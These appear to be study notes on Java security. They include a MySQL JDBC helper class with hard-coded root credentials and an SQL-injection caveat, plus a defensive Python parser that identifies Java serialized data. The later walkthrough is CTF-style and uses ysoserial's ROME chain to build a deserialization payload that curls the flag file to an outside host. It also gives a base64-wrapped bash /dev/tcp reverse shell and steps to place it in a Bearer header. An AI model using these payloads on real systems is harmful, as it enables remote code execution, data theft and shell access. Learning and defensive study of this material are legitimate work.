Java

Java_mysql

package cn.utils;

import java.sql.*;

// Minimal JDBC helper for MySQL (Connector/J 8, hence com.mysql.cj.jdbc.Driver).
// The connection, statement and result set are shared static fields, so this
// class is not safe to use from more than one thread at a time.
public class DBconn {
    public static String url = "jdbc:mysql://localhost:3306/test";
    public static String name = "root";
    public static String pwd = "123456";
    public static Connection conn = null;
    public static ResultSet rs = null;
    public static PreparedStatement ps = null;

    // Load the driver and open the connection.
    public static void init() {
        try {
            Class.forName("com.mysql.cj.jdbc.Driver");
        } catch (Exception e) {
            System.out.println("加载失败");
            e.printStackTrace();
        }
        try {
            conn = DriverManager.getConnection(url, name, pwd);
        } catch (Exception e) {
            System.out.println("init [SQL驱动程序初始化失败!]");
            e.printStackTrace();
        }
    }

    // Run a SELECT. The SQL arrives as a finished string, so although a
    // PreparedStatement is used there are no bound parameters: anything the
    // caller concatenates into `sql` is still open to SQL injection.
    public static ResultSet SelectSql(String sql) {
        System.out.println(sql);
        try {
            ps = conn.prepareStatement(sql);
            // executeQuery(String) must not be called on a PreparedStatement
            // (JDBC specifies it throws SQLException); the no-argument form
            // runs the SQL that was prepared.
            rs = ps.executeQuery();
        } catch (SQLException e) {
            System.out.println("sql数据库查询异常");
            e.printStackTrace();
        }
        return rs;
    }

    // Run an INSERT/UPDATE/DELETE and return the affected row count
    // (same injection caveat as SelectSql).
    public static int addUpdDel(String sql) {
        int i = 0;
        try {
            PreparedStatement ps = conn.prepareStatement(sql);
            i = ps.executeUpdate();
        } catch (SQLException e) {
            System.out.println("sql数据库增删改异常");
            e.printStackTrace();
        }
        return i;
    }

    // Close the connection; guard against init() having failed.
    public static void closeConn() {
        try {
            if (conn != null) {
                conn.close();
            }
        } catch (SQLException e) {
            System.out.println("sql数据库关闭异常");
            e.printStackTrace();
        }
    }

}

Deserialization

Analysing a serialized string

Example

Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu

Markers that identify serialized data:

If a piece of data begins with rO0AB, you can be fairly sure it is base64-encoded Java serialized data.

If it begins with aced instead, it is the hex form of the same Java serialization stream (rO0AB is simply the base64 of the 0xACED0005 stream header).
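An added example (not part of the original notes) that applies the two markers above from the defender's side: it normalises either encoding, confirms the 0xACED0005 stream header, and reads the top-level class name out of the stream header without deserializing anything, which is enough for a gateway or log review to flag or allow-list classes. The token is the one shown above; the function and constant names are my own.

```python
import base64
import struct

# java.io.ObjectStreamConstants values that make up the stream header
STREAM_MAGIC, STREAM_VERSION = 0xACED, 5
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72

# The serialized token shown above (page data, not constructed here)
TOKEN = ("Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFu"
         "Zy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPf"
         "AgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu")

def to_stream_bytes(data: str) -> bytes:
    """Undo the transport encoding: base64 (rO0AB...) or hex (aced...), optional Bearer prefix."""
    s = data.strip()
    if s.startswith("Bearer "):
        s = s[len("Bearer "):]
    if s.lower().startswith("aced"):
        return bytes.fromhex(s)
    if s.startswith("rO0AB"):
        return base64.b64decode(s + "=" * (-len(s) % 4))  # tolerate stripped padding
    raise ValueError("not a recognised Java serialization encoding")

def looks_like_java_serialized(data: str) -> bool:
    """True when the decoded bytes begin with STREAM_MAGIC 0xACED and version 5."""
    try:
        raw = to_stream_bytes(data)
    except ValueError:
        return False
    return len(raw) >= 4 and struct.unpack(">HH", raw[:4]) == (STREAM_MAGIC, STREAM_VERSION)

def top_level_class(data: str) -> dict:
    """Read the first class descriptor (name, serialVersionUID, flags, field count).
    Only the header is parsed and nothing is deserialized, so it is safe on untrusted input."""
    raw = to_stream_bytes(data)
    if struct.unpack(">HH", raw[:4]) != (STREAM_MAGIC, STREAM_VERSION):
        raise ValueError("bad stream header")
    if raw[4] != TC_OBJECT or raw[5] != TC_CLASSDESC:
        raise ValueError("stream does not begin with a plain object")
    name_len = struct.unpack(">H", raw[6:8])[0]  # length of the modified-UTF-8 class name
    name = raw[8:8 + name_len].decode("utf-8")
    suid, flags, nfields = struct.unpack(">QBH", raw[8 + name_len:19 + name_len])
    return {"class": name, "serialVersionUID": f"{suid:016x}", "flags": flags, "fields": nfields}

def is_expected_class(data: str, allowed=frozenset({"cn.abc.core.model.UserVo"})) -> bool:
    """Gateway-style check: accept only streams whose top-level class is on the allow-list."""
    return looks_like_java_serialized(data) and top_level_class(data)["class"] in allowed
```

This is a triage heuristic for the edge, not a replacement for the real mitigation, which is an ObjectInputFilter (JEP 290, Java 9+) on the JVM that does the deserialization.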

Java Deserialization Scanner

This tool is available as a Burp extension; download it and remember to initialise the plugin.

Select the request and send it to the extension (select, right-click -> Extensions -> Deserialization -> Send request to DS Manual testing).

In Manual Testing, wrap the string in § markers, without wrapping the Bearer prefix.

Below, choose Encode using Base64, click add, choose Encode using Base64 again, then Attack.

Wait a while; a prompt says it needs 1-3 minutes.


ROME

Then use the ROME chain from ysoserial

GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "curl http://vps:10189 -d @/flag" > a.bin

Base64-encode it

import base64
with open('a.bin', 'rb') as f:
    b = f.read()
# b64encode returns bytes; decode to str so the output has no b'' wrapper
print(base64.b64encode(b).decode())

Put it in the request to the place that performs the deserialization to trigger command execution.

You can also get a shell directly

bash -i >& /dev/tcp/111.111.111.111/7015 0>&1
Base64-encode it: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvNzAxNSAwPiYx

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvNzAxNSAwPiYx}|{base64,-d}|{bash,-i}" > a.bin

Base64-encode as above, remembering to prefix it with Bearer.

...